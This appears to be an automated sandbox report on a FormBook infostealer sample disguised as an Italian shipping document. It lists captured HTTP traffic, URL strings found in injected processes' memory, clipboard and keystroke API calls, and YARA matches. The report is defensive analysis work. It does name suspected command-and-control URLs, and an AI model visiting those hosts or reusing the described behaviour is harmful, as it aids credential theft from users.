            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:04:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.Palcoconnector.net
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3600066837.0000000008F64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3600066837.0000000008F64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.albero-dveri.online/vyk8/
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Cable_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Ntsc_Pal_Adapter.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Pal_TV.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2BQUT7Wmg
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/RCA_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%2
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/Wire_Connectors.cfm?fp=c6vU2rntkHymqt5x3kJq4vMX0U8fOmaM0f8rwBVXAAMqMu%
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/design/underconstructionnotice.php?d=palcoconnector.net
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/__media__/js/trademark.php?d=palcoconnector.net&type=ns
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3595695090.0000000007D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.palcoconnector.net/display.cfm
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000769E000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: taskkill.exe, 00000006.00000002.3593941321.00000000061EE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.000000000737A000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000005ECA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000007830000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006380000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: taskkill.exe, 00000006.00000003.2306329144.000000000311E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: taskkill.exe, 00000006.00000002.3591945619.00000000030F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: taskkill.exe, 00000006.00000003.2305171931.0000000007FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: taskkill.exe, 00000006.00000003.2312435085.000000000800E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.00000000079C2000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000006512000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
            Source: pSySrLvnviNdEH.exe, 00000005.00000002.3598647212.0000000006EC4000.00000004.80000000.00040000.00000000.sdmp, taskkill.exe, 00000006.00000002.3593941321.0000000005A14000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2417378163.00000000370A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/pk64/?4rl8h=D2L
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591841259.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3600066837.0000000008F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3593251845.00000000028D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3591581349.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132078710.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2131255938.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2131558880.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3591898064.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
